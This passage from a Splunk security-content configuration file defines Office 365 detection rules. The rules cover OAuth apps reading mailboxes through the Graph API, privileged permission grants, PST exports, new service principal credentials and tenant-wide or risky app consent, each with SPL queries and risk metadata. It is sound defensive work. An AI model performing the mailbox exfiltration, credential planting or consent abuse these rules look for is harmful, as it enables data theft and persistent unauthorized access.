compiles statistics on access frequency, timing, and client IP addresses, organized by user, client application ID, and AppId. For defenders, it's crucial to maintain an inventory of all OAuth applications that read emails, using this data to scrutinize and identify any potential abusive access patterns. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = OAuth applications may access mailboxes for legitimate purposes, you can use the ClientAppId to add trusted applications to an allow list. action.escu.creation_date = 2024-01-31 action.escu.modification_date = 2024-01-31 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 OAuth App Mailbox Access via Graph API - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = An OAuth application identified with id $ClientAppId$ accesed mailboxes through the Graph API. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 OAuth App Mailbox Access via Graph API - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This Splunk analytic detects when emails are accessed in Office 365 Exchange via the Microsoft Graph API, identified by the client ID '00000003-0000-0000-c000-000000000000'. It tracks the 'MailItemsAccessed' operation within the Exchange workload, focusing on OAuth-authenticated applications. The query compiles statistics on access frequency, timing, and client IP addresses, organized by user, client application ID, and AppId. For defenders, it's crucial to maintain an inventory of all OAuth applications that read emails, using this data to scrutinize and identify any potential abusive access patterns. action.notable.param.rule_title = O365 OAuth App Mailbox Access via Graph API action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange Operation=MailItemsAccessed AppId=* AppId=00000003-0000-0000-c000-000000000000 | stats count earliest(_time) as firstTime latest(_time) as lastTime values(ClientIPAddress) by user ClientAppId OperationCount AppId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_oauth_app_mailbox_access_via_graph_api_filter` [ESCU - O365 Privileged Graph API Permission Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = This Splunk analytic detects the assignment of critical Graph API permissions in Azure AD using O365 Unified Audit Log as its data source. It focuses on three permissions, Application.ReadWrite.All (Entitlement ID 1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions, crucial for controlling Azure AD settings, pose a high risk if misused. The query monitors Azure Active Directory workload events in the Office 365 Management Activity, specifically 'Update application' operations. It extracts and analyzes data to spot when these permissions are granted, gathering details about the user, object, and user agent involved. Due to the significant control these permissions provide, immediate investigation is crucial upon detection to prevent unauthorized modifications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This Splunk analytic detects the assignment of critical Graph API permissions in Azure AD using O365 Unified Audit Log as its data source. It focuses on three permissions, Application.ReadWrite.All (Entitlement ID 1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions, crucial for controlling Azure AD settings, pose a high risk if misused. The query monitors Azure Active Directory workload events in the Office 365 Management Activity, specifically 'Update application' operations. It extracts and analyzes data to spot when these permissions are granted, gathering details about the user, object, and user agent involved. Due to the significant control these permissions provide, immediate investigation is crucial upon detection to prevent unauthorized modifications. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Privileged Graph API permissions may be assigned for legitimate purposes. Filter as needed. action.escu.creation_date = 2024-01-30 action.escu.modification_date = 2024-01-30 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Privileged Graph API Permission Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = User $user$ assigned privileged Graph API permissions to $object$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Privileged Graph API Permission Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This Splunk analytic detects the assignment of critical Graph API permissions in Azure AD using O365 Unified Audit Log as its data source. It focuses on three permissions, Application.ReadWrite.All (Entitlement ID 1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions, crucial for controlling Azure AD settings, pose a high risk if misused. The query monitors Azure Active Directory workload events in the Office 365 Management Activity, specifically 'Update application' operations. It extracts and analyzes data to spot when these permissions are granted, gathering details about the user, object, and user agent involved. Due to the significant control these permissions provide, immediate investigation is crucial upon detection to prevent unauthorized modifications. action.notable.param.rule_title = O365 Privileged Graph API Permission Assigned action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update application." | eval newvalue = mvindex('ModifiedProperties{}.NewValue',0) | spath input=newvalue | search "{}.RequiredAppPermissions{}.EntitlementId"="1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9" OR "{}.RequiredAppPermissions{}.EntitlementId"="06b708a9-e830-4db3-a914-8e69da51d44f" OR "{}.RequiredAppPermissions{}.EntitlementId"="9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" | eval Permissions = '{}.RequiredAppPermissions{}.EntitlementId' | stats count earliest(_time) as firstTime latest(_time) as lastTime values(Permissions) by user, object, user_agent, Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_privileged_graph_api_permission_assigned_filter` [ESCU - O365 PST export alert - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects instances where a user has initiated an eDiscovery search or exported a PST file from the search results in an Office 365 environment. The detection leverages the Office 365 management activity logs, specifically filtering for events categorized under ThreatManagement with the name eDiscovery search started or exported. The initiation of an eDiscovery search or the export of a PST file can be indicative of data exfiltration attempts or unauthorized access to sensitive information. PST files often contain a wealth of sensitive data, including the content of emails. Monitoring for such activities is crucial as they can expose sensitive organizational communications and data. If confirmed as a malicious activity, it suggests that an attacker or insider threat is attempting to gather or exfiltrate data. This can lead to data breaches, loss of intellectual property, or unauthorized access to confidential communications. Immediate investigation is required to determine the scope and intent of the activity and to take appropriate remedial actions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects instances where a user has initiated an eDiscovery search or exported a PST file from the search results in an Office 365 environment. The detection leverages the Office 365 management activity logs, specifically filtering for events categorized under ThreatManagement with the name eDiscovery search started or exported. The initiation of an eDiscovery search or the export of a PST file can be indicative of data exfiltration attempts or unauthorized access to sensitive information. PST files often contain a wealth of sensitive data, including the content of emails. Monitoring for such activities is crucial as they can expose sensitive organizational communications and data. If confirmed as a malicious activity, it suggests that an attacker or insider threat is attempting to gather or exfiltrate data. This can lead to data breaches, loss of intellectual property, or unauthorized access to confidential communications. Immediate investigation is required to determine the scope and intent of the activity and to take appropriate remedial actions. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored. action.escu.creation_date = 2020-12-16 action.escu.modification_date = 2020-12-16 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 PST export alert - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = User $Source$ has exported a PST file from the search using this operation- $Operation$ with a severity of $Severity$ action.risk.param._risk = [{"risk_object_field": "Source", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 PST export alert - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects instances where a user has initiated an eDiscovery search or exported a PST file from the search results in an Office 365 environment. The detection leverages the Office 365 management activity logs, specifically filtering for events categorized under ThreatManagement with the name eDiscovery search started or exported. The initiation of an eDiscovery search or the export of a PST file can be indicative of data exfiltration attempts or unauthorized access to sensitive information. PST files often contain a wealth of sensitive data, including the content of emails. Monitoring for such activities is crucial as they can expose sensitive organizational communications and data. If confirmed as a malicious activity, it suggests that an attacker or insider threat is attempting to gather or exfiltrate data. This can lead to data breaches, loss of intellectual property, or unauthorized access to confidential communications. Immediate investigation is required to determine the scope and intent of the activity and to take appropriate remedial actions. action.notable.param.rule_title = O365 PST export alert action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Category=ThreatManagement Name="eDiscovery search started or exported" | stats count earliest(_time) as firstTime latest(_time) as lastTime by Source Severity AlertEntityId Operation Name |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_pst_export_alert_filter` [ESCU - O365 Security And Compliance Alert Triggered - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection is tailored to identify and act upon alerts generated by the Office 365 Security and Compliance Center, encompassing a broad spectrum of security and compliance issues indicative of potential threats or policy violations within the O365 workspace. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following detection is tailored to identify and act upon alerts generated by the Office 365 Security and Compliance Center, encompassing a broad spectrum of security and compliance issues indicative of potential threats or policy violations within the O365 workspace. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = O365 Security and Compliance may also generate false positives or trigger on legitimate behavior, filter as needed. action.escu.creation_date = 2024-03-25 action.escu.modification_date = 2024-03-25 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Security And Compliance Alert Triggered - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = Security and Compliance triggered an alert for $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Security And Compliance Alert Triggered - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection is tailored to identify and act upon alerts generated by the Office 365 Security and Compliance Center, encompassing a broad spectrum of security and compliance issues indicative of potential threats or policy violations within the O365 workspace. action.notable.param.rule_title = O365 Security And Compliance Alert Triggered action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=SecurityComplianceCenter Category=ThreatManagement Operation=AlertTriggered | spath input=Data path=f3u output=user | spath input=Data path=op output=operation | spath input=_raw path=wl | spath input=Data path=rid output=rule_id | spath input=Data path=ad output=alert_description | spath input=Data path=lon output=operation_name | spath input=Data path=an output=alert_name | spath input=Data path=sev output=severity | stats count earliest(_time) as firstTime latest(_time) as lastTime by user, Name, operation, rule_id, alert_description, alert_name, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_security_and_compliance_alert_triggered_filter` [ESCU - O365 Service Principal New Client Credentials - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of new credentials for Service Principals in addition to existing legitimate credentials within a Office 365 tenant. These credentials include both x509 certificates and passwords. It leverages O365 audit logs, specifically events related to credential modifications or additions within the AzureActiveDirectory workload for service principals. Service principals represent application identities in Office 365 / AzureAD, and their credentials allow applications to authenticate and access resources. Adding new credentials or modifying existing ones can be an indication of configuration changes, but it can also be a sign of malicious intent If an attacker successfully adds or modifies credentials for a service principal, they can potentially use those credentials to authenticate as the application, gaining access to resources and data the application is permitted to access. This can lead to unauthorized data access, data exfiltration, or malicious operations performed under the guise of the application action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of new credentials for Service Principals in addition to existing legitimate credentials within a Office 365 tenant. These credentials include both x509 certificates and passwords. It leverages O365 audit logs, specifically events related to credential modifications or additions within the AzureActiveDirectory workload for service principals. Service principals represent application identities in Office 365 / AzureAD, and their credentials allow applications to authenticate and access resources. Adding new credentials or modifying existing ones can be an indication of configuration changes, but it can also be a sign of malicious intent If an attacker successfully adds or modifies credentials for a service principal, they can potentially use those credentials to authenticate as the application, gaining access to resources and data the application is permitted to access. This can lead to unauthorized data access, data exfiltration, or malicious operations performed under the guise of the application action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Service Principal client credential modifications may be part of legitimate administrative operations. Filter as needed. action.escu.creation_date = 2023-08-31 action.escu.modification_date = 2023-08-31 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Service Principal New Client Credentials - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = New credentials added for Service Principal $object$ action.risk.param._risk = [{"risk_object_field": "object", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Service Principal New Client Credentials - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of new credentials for Service Principals in addition to existing legitimate credentials within a Office 365 tenant. These credentials include both x509 certificates and passwords. It leverages O365 audit logs, specifically events related to credential modifications or additions within the AzureActiveDirectory workload for service principals. Service principals represent application identities in Office 365 / AzureAD, and their credentials allow applications to authenticate and access resources. Adding new credentials or modifying existing ones can be an indication of configuration changes, but it can also be a sign of malicious intent If an attacker successfully adds or modifies credentials for a service principal, they can potentially use those credentials to authenticate as the application, gaining access to resources and data the application is permitted to access. This can lead to unauthorized data access, data exfiltration, or malicious operations performed under the guise of the application action.notable.param.rule_title = O365 Service Principal New Client Credentials action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update application*Certificates and secrets management " | stats earliest(_time) as firstTime latest(_time) as lastTime by user ModifiedProperties{}.NewValue object ObjectId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_service_principal_new_client_credentials_filter` [ESCU - O365 Tenant Wide Admin Consent Granted - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where admin consent is granted to an application within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to the admin consent action within the AzureActiveDirectory workload. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where admin consent is granted to an application within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to the admin consent action within the AzureActiveDirectory workload. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Legitimate applications may be granted tenant wide consent, filter as needed. action.escu.creation_date = 2023-09-06 action.escu.modification_date = 2023-09-06 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Tenant Wide Admin Consent Granted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = The $object$ application registration was granted tenant wide admin consent. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Tenant Wide Admin Consent Granted - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where admin consent is granted to an application within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to the admin consent action within the AzureActiveDirectory workload. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations action.notable.param.rule_title = O365 Tenant Wide Admin Consent Granted action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation="Consent to application." | eval new_field=mvindex('ModifiedProperties{}.NewValue', 4) | rex field=new_field "ConsentType: (?[^\,]+)" | rex field=new_field "Scope: (?[^\,]+)" | search ConsentType = "AllPrincipals" | stats count min(_time) as firstTime max(_time) as lastTime by Operation, user, object, ObjectId, ConsentType, Scope | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_tenant_wide_admin_consent_granted_filter` [ESCU - O365 User Consent Blocked for Risky Application - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where Office 365 has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where O365's built-in security measures have intervened. Applications that are flagged and blocked by O365 typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following analytic identifies instances where Office 365 has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where O365's built-in security measures have intervened. Applications that are flagged and blocked by O365 typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Microsofts algorithm to identify risky applications is unknown and may flag legitimate applications. action.escu.creation_date = 2023-10-11 action.escu.modification_date = 2023-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 User Consent Blocked for Risky Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = O365 has blocked $user$ attempt to grant to consent to an application deemed risky. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 User Consent Blocked for Risky Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 100, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where Office 365 has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where O365's built-in security measures have intervened. Applications that are flagged and blocked by O365 typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures. action.notable.param.rule_title = O365 User Consent Blocked for Risky Application action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Consent to application." ResultStatus=Failure | eval permissions =mvindex('ModifiedProperties{}.NewValue', 4) | eval reason =mvindex('ModifiedProperties{}.NewValue', 5) | search reason = "Risky application detected" | rex field=permissions "Scope: (?[^,]+)" | stats max(_time) as lastTime by Operation, user, reason, object, Scope | `security_content_ctime(lastTime)` | `o365_user_consent_blocked_for_risky_application_filter` [ESCU - O365 User Consent Denied for OAuth Application - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Office 365 environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Office 365 environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 events. action.escu.known_false_positives = OAuth applications that require mail permissions may be legitimate, investigate and filter as needed. action.escu.creation_date = 2023-10-12 action.escu.modification_date = 2023-10-12 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 User Consent Denied for OAuth Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ denifed consent for an OAuth application. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m 